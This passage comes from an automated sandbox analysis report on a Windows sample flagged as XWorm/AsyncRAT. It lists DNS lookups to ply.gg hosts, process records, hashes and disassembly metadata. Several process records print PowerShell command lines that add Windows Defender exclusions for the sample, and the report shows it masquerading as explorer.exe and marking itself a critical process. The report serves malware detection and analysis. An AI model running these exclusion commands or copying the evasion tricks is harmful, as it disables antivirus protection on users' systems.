                                                                        Oct 27, 2024 18:07:36.670016050 CET192.168.2.41.1.1.10xc852Standard query (0)have-lucia.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Oct 27, 2024 18:07:11.492434978 CET1.1.1.1192.168.2.40xa34fNo error (0)develop-versions.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false
                                                                        Oct 27, 2024 18:07:36.703133106 CET1.1.1.1192.168.2.40xc852No error (0)have-lucia.gl.at.ply.gg147.185.221.23A (IP address)IN (0x0001)false

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:13:06:01
                                                                        Start date:27/10/2024
                                                                        Path:C:\Users\user\Desktop\Zvas34nq1T.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\Zvas34nq1T.exe"
                                                                        Imagebase:0xe10000
                                                                        File size:36'864 bytes
                                                                        MD5 hash:3830EA8C8B7A7730A6446CA3C8A61180
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:1
                                                                        Start time:13:06:05
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:13:06:05
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:13:06:12
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:13:06:12
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:13:06:24
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:13:06:24
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:13:06:39
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:13:06:39
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:13:07:10
                                                                        Start date:27/10/2024
                                                                        Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\explorer.exe"
                                                                        Imagebase:0x5c0000
                                                                        File size:36'864 bytes
                                                                        MD5 hash:3830EA8C8B7A7730A6446CA3C8A61180
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: ditekSHen
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 89%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:13:07:19
                                                                        Start date:27/10/2024
                                                                        Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\explorer.exe"
                                                                        Imagebase:0x1a0000
                                                                        File size:36'864 bytes
                                                                        MD5 hash:3830EA8C8B7A7730A6446CA3C8A61180
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:19.5%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:3
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 3130 7ffd9b8925dd 3131 7ffd9b89260f RtlSetProcessIsCritical 3130->3131 3133 7ffd9b8926c2 3131->3133

                                                                          Executed Functions

                                                                          Function 00007FFD9B890E69 Relevance: 1.9, Strings: 1, Instructions: 637COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2985442851.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_Zvas34nq1T.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: SAN_^
                                                                          • API String ID: 0-3629432999
                                                                          • Opcode ID: d2c7ee4f6ddc1b31cb1b7d5498b096773f9f296fab0c535d33be783fd5fe6a58
                                                                          • Instruction ID: 502fa9569343f1a27d54a62dd13c4fd138ac5d870d40dc943ea25ccae4963d5d
                                                                          • Opcode Fuzzy Hash: d2c7ee4f6ddc1b31cb1b7d5498b096773f9f296fab0c535d33be783fd5fe6a58
                                                                          • Instruction Fuzzy Hash: C612D721B2DA494FEB98FB7888696BD77D2FF9C304F440579E41DC32D6DE28A8418781
                                                                          Function 00007FFD9B8925DD Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 144 7ffd9b8925dd-7ffd9b8926c0 RtlSetProcessIsCritical 148 7ffd9b8926c8-7ffd9b8926fd 144->148 149 7ffd9b8926c2 144->149 149->148
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2985442851.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_Zvas34nq1T.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalProcess
                                                                          • String ID:
                                                                          • API String ID: 2695349919-0
                                                                          • Opcode ID: a1422384bff81105ad7d53aea73b5dded1202dbb3462ea5502252e66a7e53ac1
                                                                          • Instruction ID: 7189f6be3b1cb0d75c71a8a52763367e9b3bb04cc4d6486f23d7a9c5e7b1d30b
                                                                          • Opcode Fuzzy Hash: a1422384bff81105ad7d53aea73b5dded1202dbb3462ea5502252e66a7e53ac1
                                                                          • Instruction Fuzzy Hash: 2B41F23190C6488FCB19DF98D855AE9BBF0EF5A310F04416EE08AC3592CB746846CB91

                                                                          Executed Functions

                                                                          Function 00007FFD9B956605 Relevance: .4, Instructions: 441COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1784606362.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7fa898c35575bf4f94063559f52bf107c398023f86398079b642de4b7b534d4e
                                                                          • Instruction ID: 0b0944274a15e7cd1811c2626b54039ecfd6cab39f95e29b1edc89f7d728ec01
                                                                          • Opcode Fuzzy Hash: 7fa898c35575bf4f94063559f52bf107c398023f86398079b642de4b7b534d4e
                                                                          • Instruction Fuzzy Hash: C2D14772A1FB8E2FE7A597A848655B97BA0EF52314B0901FED85CC70E3DA58AC05C341
                                                                          Function 00007FFD9B88A0D3 Relevance: .3, Instructions: 258COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1783907356.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2354574a4120c1327392611a8eb52f793dacb7d61a80654c1428420b44167c8c
                                                                          • Instruction ID: bf4389d85a92c70269dc00b9b829ec578410313b6b5cceef1a0165a0981e0fc4
                                                                          • Opcode Fuzzy Hash: 2354574a4120c1327392611a8eb52f793dacb7d61a80654c1428420b44167c8c
                                                                          • Instruction Fuzzy Hash: 22119A7290FBC89FD7138B2888690903FB0EE5721170A01EBC099CB0B3D6690909C393
                                                                          Function 00007FFD9B954073 Relevance: .2, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1784606362.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c5efa328bb9f563fd4cb4e1863bfc4806b524903fdf6e6118b03bd1000d0998e
                                                                          • Instruction ID: e4384b696874b63a0c4d615ae9a6a53a2f727c1612fedb7c5db6fc04eb5fd68e
                                                                          • Opcode Fuzzy Hash: c5efa328bb9f563fd4cb4e1863bfc4806b524903fdf6e6118b03bd1000d0998e
                                                                          • Instruction Fuzzy Hash: 89515932B5EA4A1FE7E9CAAC542167477D2EFA5220F1940BEC45DC72EBDE14EC058341
                                                                          Function 00007FFD9B954370 Relevance: .1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1784606362.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a1159687d710232136b0dc0ee1eeab7448ac80307c363aee35320e3377f18b2c
                                                                          • Instruction ID: 9134564bf933e50f72605cc4c1d0d31392c30e717db668080edd2a1692a8bdb7
                                                                          • Opcode Fuzzy Hash: a1159687d710232136b0dc0ee1eeab7448ac80307c363aee35320e3377f18b2c
                                                                          • Instruction Fuzzy Hash: CD414932B5EA495FEBE9DBAC54206B477D1EF80720B0901BED45DC72ABEA54BD018341
                                                                          Function 00007FFD9B889758 Relevance: .1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1783907356.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f267074afc7e1031cc4d4b10d87cd1a5b426c3ece1305480f9699ca30b705599
                                                                          • Instruction ID: 242cfa5f7d60521d8201540e25bccec82bf6b347c80119d8fd28d2938676bb90
                                                                          • Opcode Fuzzy Hash: f267074afc7e1031cc4d4b10d87cd1a5b426c3ece1305480f9699ca30b705599
                                                                          • Instruction Fuzzy Hash: 61311A71A1CF4C8FDB589F5CA84A6E9BBE1FB98310F00412FE44983252DB30A855CBC2
                                                                          Function 00007FFD9B76E384 Relevance: .1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1783475461.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b76d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 91fb02cb43889254bb0ca8fa599d6d7795658608499db47e726a1555b4fedfd7
                                                                          • Instruction ID: c54e4b8a538408a6dc3af4cf2d1ec2f8645a4316d2c6ab255db80bab17a5c090
                                                                          • Opcode Fuzzy Hash: 91fb02cb43889254bb0ca8fa599d6d7795658608499db47e726a1555b4fedfd7
                                                                          • Instruction Fuzzy Hash: 9A41187150EBC48FE7568B3998559523FF0EF52314B1602EFD088CB1B7D625A846C7A3
                                                                          Function 00007FFD9B88A62C Relevance: .1, Instructions: 100COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1783907356.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 31d11986af45d627869a5405b61a827098ce1794827084d9b260ad2debc1ff28
                                                                          • Instruction ID: 1b1413e3a30848a7d0ec0cf81fce8a299f766f13df5018a6a2064bc0ee44d64c
                                                                          • Opcode Fuzzy Hash: 31d11986af45d627869a5405b61a827098ce1794827084d9b260ad2debc1ff28
                                                                          • Instruction Fuzzy Hash: F421F83190DB4C4FDB59DFAC984A7E97BF0EB96321F04416BD048C3156DA74941ACB91
                                                                          Function 00007FFD9B9540BF Relevance: .1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1784606362.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4ef327b630c09e807eea98ae2d49ecafbb205666b01bb9fabf1cceb2aa466541
                                                                          • Instruction ID: 0266110101689e74bfa2d0bfbab05ad1888ffbd9bfeabe317d70d8241a29ae30
                                                                          • Opcode Fuzzy Hash: 4ef327b630c09e807eea98ae2d49ecafbb205666b01bb9fabf1cceb2aa466541
                                                                          • Instruction Fuzzy Hash: BD21F722B6F94A1FE7F9CAA8446167467C1EF71210B5A40BDD85DC72FADE18EC058301
                                                                          Function 00007FFD9B9543BC Relevance: .1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1784606362.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dec656f42b907e6a41f514d6c0b0e4ecb602b38e4830fe697d81d2a0b22013ba
                                                                          • Instruction ID: dc4ef2aa5cd9f4685c304f80574e9b916b13e982d9080b53c24b79f4112f95b2
                                                                          • Opcode Fuzzy Hash: dec656f42b907e6a41f514d6c0b0e4ecb602b38e4830fe697d81d2a0b22013ba
                                                                          • Instruction Fuzzy Hash: B111C132A9F5895FE7E4DBA8947467877D0EF40220B5A00BED46DC72BBDA68AD108341
                                                                          Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1783907356.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                          Non-executed Functions

                                                                          Function 00007FFD9B888BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1783907356.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N_^4$N_^7$N_^F$N_^J
                                                                          • API String ID: 0-3508309026
                                                                          • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                          • Instruction ID: 3d73ddd26afee8af5c4e977c855be3ba5e549368567e4c73e868d7912246f78f
                                                                          • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                          • Instruction Fuzzy Hash: B32107B77084358ED30A7BBCBD289D93740DB9423874501B3D2A9CB183E914608786C1

                                                                          Executed Functions

                                                                          Function 00007FFD9B9739D1 Relevance: 4.1, Strings: 2, Instructions: 1571COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1899503788.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (7Kp$J_H
                                                                          • API String ID: 0-3022419712
                                                                          • Opcode ID: 6d233542ec4dc88c6cb3412244bea08f75a59d804294b724484b0f57a86220f5
                                                                          • Instruction ID: 9e552f67dca1437adf987bd34b63fa78a08658b623e3207f85c70197b9c1c885
                                                                          • Opcode Fuzzy Hash: 6d233542ec4dc88c6cb3412244bea08f75a59d804294b724484b0f57a86220f5
                                                                          • Instruction Fuzzy Hash: 9CA23922B1F78A1FE7A6976858A55B43FE1EF56210B0A01FFD08DC71E3DE18AD068351
                                                                          Function 00007FFD9B976605 Relevance: 1.7, Strings: 1, Instructions: 436COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1899503788.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: X7Kp
                                                                          • API String ID: 0-1297214646
                                                                          • Opcode ID: 42dcfc36f263d7606089535cbc7ba537cfa41d5061d4e4cdadc201639423eac1
                                                                          • Instruction ID: afa242e2edd0839355d0b576ee4958c7b2ac1896ab598ea6baaaabf16e2c0466
                                                                          • Opcode Fuzzy Hash: 42dcfc36f263d7606089535cbc7ba537cfa41d5061d4e4cdadc201639423eac1
                                                                          • Instruction Fuzzy Hash: B9D15632A1FB8D1FEBA5EBA848A55B57BE1EF56310B0901FED45CC70E3DA18AD058341
                                                                          Function 00007FFD9B8A9750 Relevance: .1, Instructions: 142COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8ef75f2c741e329909f82a319cf2ad885aec50a9a6b142d1358b1258e65e9c75
                                                                          • Instruction ID: 00f0d83d4c12f3c9171ee2c8f440895aa1d5e7643ca6225467baa4130732c9a3
                                                                          • Opcode Fuzzy Hash: 8ef75f2c741e329909f82a319cf2ad885aec50a9a6b142d1358b1258e65e9c75
                                                                          • Instruction Fuzzy Hash: A541287190DB884FDB199F5C9C0A6A97BE0FB59310F04416FE499C3292CA74A905CBC2
                                                                          Function 00007FFD9B9740BF Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1899503788.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 32f3f9e0461efefb0ecb9c88f39db5a9a853ff20f505fb78b9135050b4a0b32a
                                                                          • Instruction ID: 472576a37f5b9bf85a72617f25f3f851de5fe30da02cb58298aac34b15ffa3f0
                                                                          • Opcode Fuzzy Hash: 32f3f9e0461efefb0ecb9c88f39db5a9a853ff20f505fb78b9135050b4a0b32a
                                                                          • Instruction Fuzzy Hash: 7421C422B2E98A2FE7B9EA5844A227867C1EF65210B4A40BDD05DC76B3DE14EC058341
                                                                          Function 00007FFD9B8AA49C Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6927ed7a30ec17e123cf7dbc2df199ed9af3f416a639a16b45393ac883a46ec2
                                                                          • Instruction ID: 66e3edb859411b74877b3245194366d37b9d38874e2a268cb10d9087d9a2d402
                                                                          • Opcode Fuzzy Hash: 6927ed7a30ec17e123cf7dbc2df199ed9af3f416a639a16b45393ac883a46ec2
                                                                          • Instruction Fuzzy Hash: 5621F63190C74C4FDB59DBAC984A7E97BE0EB96321F04416BD448C3166DA74A81ACB91
                                                                          Function 00007FFD9B78EC61 Relevance: .1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1897576662.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b78d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40063d549586df959eece74cd26b6b93e13cc3102fc03c79475eab84498f6f49
                                                                          • Instruction ID: 0f0480cae4aaf4d335530606a5ae79f4c88074161cead5db0406e4a52d42084b
                                                                          • Opcode Fuzzy Hash: 40063d549586df959eece74cd26b6b93e13cc3102fc03c79475eab84498f6f49
                                                                          • Instruction Fuzzy Hash: F3113D31A0CF088F9BA8EF2DE4859567BE1FB98321B10066ED449C7665D731E881CB82
                                                                          Function 00007FFD9B9743BC Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1899503788.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8ea837c6a8f7bd92170f423fc9a96f65f628c10f54b7df1a2b2602d252f61ea
                                                                          • Instruction ID: a2e6136c0174c8a312cd33b458fe0de0f966c95637d170e0389fef720c216166
                                                                          • Opcode Fuzzy Hash: b8ea837c6a8f7bd92170f423fc9a96f65f628c10f54b7df1a2b2602d252f61ea
                                                                          • Instruction Fuzzy Hash: C1110232B1F54A5FE7B8D65C94B06B837D0FF40720B5A00BEE42DC76A3DA18AD018340
                                                                          Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
